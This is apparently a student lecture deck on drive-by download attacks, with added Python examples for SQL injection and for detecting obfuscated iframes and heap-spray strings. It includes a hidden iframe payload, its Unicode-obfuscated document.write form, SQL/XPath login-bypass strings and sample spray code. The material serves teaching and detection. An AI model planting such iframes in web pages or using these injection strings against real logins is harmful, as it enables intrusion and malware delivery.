Page 1: Drive by downloads-cns


Drive-By Downloads

Presenter: Darakhshan Naz

Teacher: Professor Dr. Muhammad Mubashir Khan

04.05.2013

Page 2: Drive by downloads-cns


Agenda

• Introduction
• Mechanisms of Drive-by Download
• General Detection Approach
• Security Measures
• Assessment & Conclusion

Page 3: Drive by downloads-cns


What is Drive-by Download?

A technique that involves:
◦ Intended downloads without understanding the consequences, e.g. executables
◦ Unintended downloads, e.g. viruses, spyware

Can happen by:
◦ Visiting a website
◦ Viewing an email message

Installs a malicious program, termed malware.
◦ Through malware, the attacker gets full or partial control of the victim's system.

INTRODUCTION

Page 4: Drive by downloads-cns


Example - Scenario: Drive-By Download!

Actors in the diagram: User, User's browser, Attacker.

(1) Open browser
(2) Read email; it contains a website link
(3) The link attracts the user's interest; the user clicks
(4) Go to website; the website has many links
(5) Surf every site but get bored (no interest develops); close the website
(6) Attacker sends the user a spoofed email
(7) Attacker sends malicious code to the user's browser and exploits a vulnerability
(8) Malicious code creates a connection between user and attacker
(9) Download and install its backdoor program
(10) Steal all the user's important files and make him compromised over the network

The user is completely unaware of the attack.

Source of concept: Report "Defence against Drive-by Download" by the National Security Agency, US

INTRODUCTION

Page 5: Drive by downloads-cns


Purpose of Drive-by Download

• Provide a gateway to botnets.
• Take advantage of vulnerabilities.
• Steal personal or confidential information of the user.
• Lead or redirect the user to other malicious websites and make him compromised.

INTRODUCTION

Page 6: Drive by downloads-cns


Mechanisms of Drive-by Download

Basic Concept of Drive-by Download Attack (Source: [1])

[Figure: four numbered steps (1-4) grouped into two phases, Injection and Exploitation]

Page 7: Drive by downloads-cns


Injection

What is Injection:
◦ The act of entering data into an application, bypassing its security controls, to change its behaviour in an unexpected way.

Reason for Injection:
◦ Existence of vulnerabilities.

A Drive-by Download is initiated by the injection of malicious code into a database, application or server.

Ways of malicious code injection:
◦ Injection through iFrames
◦ SQL Injection
◦ XPath Injection

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 8: Drive by downloads-cns


How and where to Inject?

Source: http://www.malware-info.com/mal_faq_inject.html

[Figure: where malicious code is injected: SQL Injection, XPath Injection, injection through iFrames, and malware placed directly on the web server]

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 9: Drive by downloads-cns


Injection through iFrames

The most basic form of injected code is a malicious iFrame such as:

Example:

    <div style=visibility: hidden; position: absolute: 1; top:1>
      <iframe id=IFRAME name=IFRAME
        src= http://www.example.com/page_with_malware.htm
        scrolling= no width=1 height=1 vspace=0
        hspace=0 frameborder=0>
      </iframe>
    </div>

This iFrame is present in the HTML of a requested web page.

Content from this source renders in an invisible 1 pixel x 1 pixel window.

Sometimes iFrames are present in an encoded form that looks normal. The process of encoding is known as "obfuscation".

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 10: Drive by downloads-cns


Obfuscation

The process of disguising code through encoding. The previous iFrame can be converted to a JavaScript Unicode string using any encoding tool.

Encoding tool: http://www.auditmypc.com/html-encoder.asp

When the injected page is browsed, the JavaScript dynamically generates the iFrame.

This causes malicious content from a website controlled by the attacker to execute inside the requested web page.

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 11: Drive by downloads-cns


Obfuscation

The obfuscated form of the iFrame is:

<script type="text/javascript">document.write('\u003C\u0064\u0069\u0076\u0020\u0073\u0074\u0079\u006C\u0065\u003D\u0076\u0069\u0073\u0069\u0062\u0069\u006C\u0069\u0074\u0079\u003A\u0020\u0068\u0069\u0064\u0064\u0065\u006E\u003B\u0020\u0070\u006F\u0073\u0069\u0074\u0069\u006F\u006E\u003A\u0020\u0061\u0062\u0073\u006F\u006C\u0075\u0074\u0065\u003A\u0020\u0031\u003B\u0020\u0074\u006F\u0070\u003A\u0031\u003E\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u003C\u0069\u0066\u0072\u0061\u006D\u0065\u0020\u0069\u0064\u003D\u0049\u0046\u0052\u0041\u004D\u0045\u0020\u006E\u0061\u006D\u0065\u003D\u0049\u0046\u0052\u0041\u004D\u0045\u000D\u0020\u0020\u0020\u0073\u0072\u0063\u003D\u0020\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0065\u0078\u0061\u006D\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0070\u0061\u0067\u0065\u005F\u0077\u0069\u0074\u0068\u005F\u006D\u0061\u006C\u0077\u0061\u0072\u0065\u002E\u0068\u0074\u006D\u000D\u0020\u0020\u0020\u0073\u0063\u0072\u006F\u006C\u006C\u0069\u006E\u0067\u003D\u0020\u006E\u006F\u0020\u0077\u0069\u0064\u0074\u0068\u003D\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003D\u0031\u0020\u0076\u0073\u0070\u0061\u0063\u0065\u003D\u0030\u000D\u0020\u0020\u0020\u0020\u0068\u0073\u0070\u0061\u0063\u0065\u003D\u0030\u0020\u0020\u0066\u0072\u0061\u006D\u0065\u0062\u006F\u0072\u0064\u0065\u0072\u003D\u0030\u003E\u000D\u003C\u002F\u0069\u0066\u0072\u0061\u006D\u0065\u003E\u000D\u003C\u002F\u0064\u0069\u0076\u003E\u000D\u000D');</script>

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 12: Drive by downloads-cns

SQL Injection

Bypasses the authentication process. Gives a malicious user or attacker access to data.

Example: In any user form page, if we enter

Username: ' OR '1'='1   and   Password: ' OR '1'='1

then the web page will execute this query:

    SELECT * FROM Users
    WHERE Username='' OR '1'='1'
    AND Password='' OR '1'='1'

The parameters always yield a logically true condition.

The authentication check passes and the attacker can get access to any account in the database.

MECHANISMS OF DRIVE-BY DOWNLOAD
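Added example, not part of the slides: a small Python/sqlite3 program that runs the slide's login query twice, once built by string concatenation (the vulnerable form) and once as a parameterized query, so the same ' OR '1'='1 input can be seen to bypass the first and to be treated as a plain, non-existent username by the second. The Users table and its single row are constructed for the demonstration.

```python
import sqlite3

def make_db():
    """Constructed sample user table (not from the slides)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('John', 'test123')")
    return conn

def login_vulnerable(conn, username, password):
    """Builds the statement by concatenation, as on the slide: the quotes in the
    input become part of the SQL, so the WHERE clause can be made always true."""
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    """Parameterized query: the input is bound as data and cannot change the
    statement, so the same payload is just a username that does not exist."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable, injected input:", login_vulnerable(db, payload, payload))
    print("parameterized, same input: ", login_safe(db, payload, payload))
```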

Page 13: Drive by downloads-cns


XPath Injection

Similar to SQL Injection, but now the "target" is an XML document. The insecurity is caused by the injection of XPath queries or conditions through the web page.

Example:
◦ If a user has an account on a site with Username=John and Password=test123, then logically he will see his account only.
◦ If the same user enters his username as John' or 1 = 1 with the same password, then the system will authenticate him and show the entire XML document to him.

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 14: Drive by downloads-cns


Mechanism of Drive-by Download

Basic Concept of Drive-by Download Attack (Source: [1])

[Figure, repeated from page 6: four numbered steps (1-4) grouped into two phases, Injection and Exploitation]

Page 15: Drive by downloads-cns


Exploitation

What is Exploitation:
◦ The act by an attacker of performing activities of his own choosing on the victim's system after getting full or partial control.

Reason for Exploitation:
◦ Ignoring updates of installed applications.
◦ According to Secunia PSI, about 95.46% of users have one or more insecure applications.
◦ A newer version may correct one or more vulnerabilities in the installed application.

Vulnerabilities that are mostly exploited:
◦ Browser Vulnerability
◦ Plugin Vulnerability
◦ File Format Vulnerability

MECHANISMS OF DRIVE-BY DOWNLOAD

Page 16: Drive by downloads-cns


Types of Vulnerabilities

Browser Vulnerability
◦ The attacker injects malicious code into the user's browser and changes its settings without his knowledge.

Plugin Vulnerability
◦ Plugins are provided by third parties and can be vulnerable; they may lead to buffer overflows, memory corruption issues and pointer overwrites.

File Format Vulnerability
◦ Attackers attach malware to Word, Excel or PDF files, distributed through email or websites. The exploit occurs when the editing program opens them.

Page 17: Drive by downloads-cns


General Detection Approach

JavaScript-based malware is difficult to detect and analyze. It requires a comprehensive approach that detects both the root cause and the dynamic behaviour.

Specialized Detection Methods:
◦ CUJO [2]: static + dynamic analysis of JavaScript; detection through machine learning.
◦ ARROW [8]: creates regular expression signatures for the servers of malware distribution networks (MDNs) and evaluates their effectiveness.

Here the generalized detection approach will be discussed, which is the basic idea behind detection.

Page 18: Drive by downloads-cns


Step 1: Analysis of JS Redirection

For an effective detection approach, analysis of JavaScript is mandatory.

• The user is victimized in two ways:
◦ Either he is directly exposed to a vulnerable site,
◦ or an attacker reaches him through a series of redirections.

Two approaches can be taken to investigate redirections:
◦ Adding hooks to the JavaScript code (e.g. on document.location).
◦ Taking the browser's history.

GENERAL DETECTION APPROACH

Page 19: Drive by downloads-cns


Step 2: JavaScript Deobfuscation

Most malicious JavaScript is in obfuscated (encoded) form.

Deobfuscation (conversion from the complex form back to the simple form) helps to identify malicious code.

It is possible manually or with an automated tool.

Automated tools, e.g.:
◦ Developer Tools in Google Chrome.
◦ Microsoft Script Debugger or Editor.

GENERAL DETECTION APPROACH
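As an added example (not from the slides), the following Python script applies this deobfuscation step to a page like the one on slide 11: it pulls the \uXXXX literal out of document.write('...'), decodes it, and reports iframes that are 1x1 or sit inside a visibility:hidden div. The sample page is constructed inline by imitating an HTML encoder (this is not the referenced tool's code), and the malware.example host is a placeholder.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the slides): a hidden iframe as on slide 9, then the
# \uXXXX form an HTML encoder produces (this imitates such an encoder, not its code).
HIDDEN_IFRAME = ('<div style="visibility: hidden; position: absolute; top:1">'
                 '<iframe src="http://malware.example/page_with_malware.htm" '
                 'width=1 height=1 frameborder=0></iframe></div>')
OBFUSCATED = "".join("\\u%04X" % ord(c) for c in HIDDEN_IFRAME)
INJECTED_PAGE = ('<html><body><p>Hello</p><script type="text/javascript">'
                 "document.write('" + OBFUSCATED + "');</script></body></html>")

WRITE_RE = re.compile(r"document\.write\(\s*'((?:[^'\\]|\\.)*)'\s*\)")
UNICODE_RE = re.compile(r"\\u([0-9a-fA-F]{4})")

def deobfuscate(js_literal):
    """Step 2: turn every \\uXXXX escape back into the character it hides."""
    return UNICODE_RE.sub(lambda m: chr(int(m.group(1), 16)), js_literal)

class HiddenIframeFinder(HTMLParser):
    """Collects iframe sources that are 1x1 or nested in a visibility:hidden div."""
    def __init__(self):
        super().__init__()
        self.div_hidden = []      # one flag per currently open <div>
        self.suspicious = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "div":
            self.div_hidden.append("hidden" in (a.get("style") or ""))
        elif tag == "iframe":
            dims = [a.get(k) or "" for k in ("width", "height")]
            tiny = all(d.isdigit() and int(d) <= 1 for d in dims)
            if tiny or any(self.div_hidden):
                self.suspicious.append(a.get("src") or "")
    def handle_endtag(self, tag):
        if tag == "div" and self.div_hidden:
            self.div_hidden.pop()

def find_hidden_iframes(page_html):
    """Decode each document.write('...') literal and report hidden iframe sources."""
    found = []
    for m in WRITE_RE.finditer(page_html):
        finder = HiddenIframeFinder()
        finder.feed(deobfuscate(m.group(1)))
        found.extend(finder.suspicious)
    return found

if __name__ == "__main__":
    print(find_hidden_iframes(INJECTED_PAGE))
```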

Page 20: Drive by downloads-cns


Step 3: Detection of Memory Corruption

Most attacks corrupt memory.

The attacker tries to get into the browser and run his shellcode.
◦ A shellcode is a small piece of code through which the attacker gets control of the victim's system.

• The attacker then uses JavaScript to allocate a large number of strings for the shellcode.
• These strings are not part of the real code; the attacker allocates them only to fill memory.
• Detection of these strings can give an indication of shellcode.

GENERAL DETECTION APPROACH

Page 21: Drive by downloads-cns


Contd.

Detection of these strings can be done in two ways:
◦ Controlling and tracking string variables whenever they are created.
◦ For automated detection, the libemu library is used. It searches from each character and, when it finds a sequence of valid instructions, reports shellcode.

GENERAL DETECTION APPROACH
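Added example (not from the slides and not libemu): a static Python heuristic for the string-allocation symptom described in Steps 3 and 4. It decodes unescape("%u....") literals into 16-bit words, measures the longest run of one repeated word, and looks for a loop that doubles a string up to a large target length; both sample scripts are constructed here and the thresholds are assumptions.

```python
import re

# Constructed sample scripts (not from the slides): one that builds a large
# repeated string the way memory-filling pages do, and one ordinary script.
SPRAY_JS = """
var pad = unescape("%u9090%u9090%u9090%u9090");
while (pad.length < 0x40000) pad += pad;
var blocks = new Array();
for (var i = 0; i < 200; i++) blocks[i] = pad;
"""
BENIGN_JS = """
var greeting = unescape("%u0048%u0069");   // "Hi"
document.getElementById("out").innerText = greeting;
"""

UNESCAPE_RE = re.compile(r'unescape\(\s*"((?:%u[0-9a-fA-F]{4})+)"\s*\)')
GROW_RE = re.compile(r'while\s*\(\s*(\w+)\.length\s*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)'
                     r'\s*\1\s*\+=\s*\1')

def decode_unescape(literal):
    """Turn %uXXXX units into the 16-bit words the string allocates."""
    return [int(u, 16) for u in re.findall(r'%u([0-9a-fA-F]{4})', literal)]

def longest_run(words):
    """Length of the longest run of one repeated word (filler looks like this)."""
    best = run = 0
    for i, w in enumerate(words):
        run = run + 1 if i and w == words[i - 1] else 1
        best = max(best, run)
    return best

def scan_js(src, min_run=4, min_target=0x10000):
    """Report repeated-word strings and loops that double a string to a large
    size; thresholds are assumed values, not taken from the slides."""
    findings = []
    for m in UNESCAPE_RE.finditer(src):
        words = decode_unescape(m.group(1))
        if longest_run(words) >= min_run:
            findings.append("repeated-word string: 0x%04x x%d" % (words[0], len(words)))
    for m in GROW_RE.finditer(src):
        if int(m.group(2), 0) >= min_target:
            findings.append("string %s doubled until length %s" % (m.group(1), m.group(2)))
    return findings

if __name__ == "__main__":
    print(scan_js(SPRAY_JS))
    print(scan_js(BENIGN_JS))
```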

Page 22: Drive by downloads-cns


Step 4: Investigation of Exploitation

Exploitation is the last step of a Drive-by Download attack; it takes advantage of vulnerabilities.

It can be detected in two ways:
◦ Analysis of the behaviour of browsers and plug-ins.
◦ Monitoring of strings passed as parameters and of method calls. Usually long strings are used in exploits, and certain methods are called when downloading malware.

GENERAL DETECTION APPROACH

Page 23: Drive by downloads-cns


Security Measures

• Keeping software updated.
• Installing web-filtering software.
• Implementing BLADE (Block All Drive-by Download Exploits).
• Proper management by network administrators.
• Users should be careful while visiting sites, especially entertainment and social sites, as they may host adversaries.
• Using reputed search engines like Google, Microsoft, Yahoo, AVG or Bing.
• Using a virtual machine for web browsing.

Page 24: Drive by downloads-cns


The Good

Automated techniques (compiler or library) of deobfuscation are really helpful for the identification of malicious JavaScript.

Detection should be focused on central points.
◦ EvilSeed [11] provides a crawling approach focusing on the central points of malware.

Machine learning can provide lightweight JavaScript analysis, fast detection mechanisms and handling of vulnerabilities at runtime.

Proper input validation can reduce SQL and XPath injection.

ASSESSMENT & CONCLUSION

Page 25: Drive by downloads-cns


The Bad

Can easily happen but is very hard to overcome.

The possibilities of attack are rapidly increasing, but validating a detection approach is not possible every time.

A defensive approach is better for fighting these attacks, for two reasons:
◦ Intensely dynamic behaviour.
◦ Complex and time-consuming detection approaches.

ASSESSMENT & CONCLUSION

Page 26: Drive by downloads-cns


The Ugly

Mostly shows unexpected behaviour.

Due to the diversity of attack methods, it has a high ratio of victims and it is difficult to design a detection approach that covers all possibilities.

No computing device seems to be safe from Drive-by Download.

As Drive-by Download attacks are increasing enormously, perhaps in the near future hard drive or portable device vulnerabilities may also exist.

ASSESSMENT & CONCLUSION

Page 27: Drive by downloads-cns


Thanks for your attention

Page 28: Drive by downloads-cns


References (1)

[1] Egele, M., Wurzinger, P., Kirda, E.: Defending Browsers against Drive-by Downloads: Mitigating Heap-Spraying Code Injection Attacks (2009).

[2] Rieck, K., Krueger, T., Dewald, A.: CUJO: Efficient Detection and Prevention of Drive-by Download Attacks. Technische Universität Berlin.

[3] Stone-Gross, B., Cova, M., Kruegel, C., Vigna, G.: Peering through the iFrame. University of California, University of Birmingham.

[4] Westervelt, R.: Kaspersky website hacked (February 2009).

[5] Cova, M., Kruegel, C., Vigna, G.: Detection and Analysis of Drive-by-Download Attacks and Malicious JavaScript Code. University of California, Santa Barbara. From the ACM Digital Library.

[6] Interesting statistics from the Secunia PSI (January 2008). http://secunia.com/blog/18.

Page 29: Drive by downloads-cns


References (2)

[7] Lu, L., Yegneswaran, V., Porras, P.: BLADE: An Attack-Agnostic Approach for Preventing Drive-By Malware Infections. College of Computing, Georgia Institute of Technology; SRI International. From the ACM Digital Library.

[8] Zhang, J., Seifert, C., Stokes, J.W., Lee, W.: ARROW: Generating Signatures to Detect Drive-By Downloads. Georgia Institute of Technology, Microsoft Bing, Microsoft Research.

[9] Devi, D., Pathak, D., Nandi, S.: Vulnerabilities in Web Browsers. Indian Institute of Technology, Guwahati, India.

[10] Provos, N., Mavrommatis, P., Abu Rajab, M., Monrose, F.: All Your iFrames Point to Us. Google Inc., Johns Hopkins University.

[11] Invernizzi, L., Benvenuti, S., Cova, M., Comparetti, P. M., Kruegel, C., Vigna, G.: EVILSEED: A Guided Approach to Finding Malicious Web Pages. 2012 IEEE Symposium on Security and Privacy.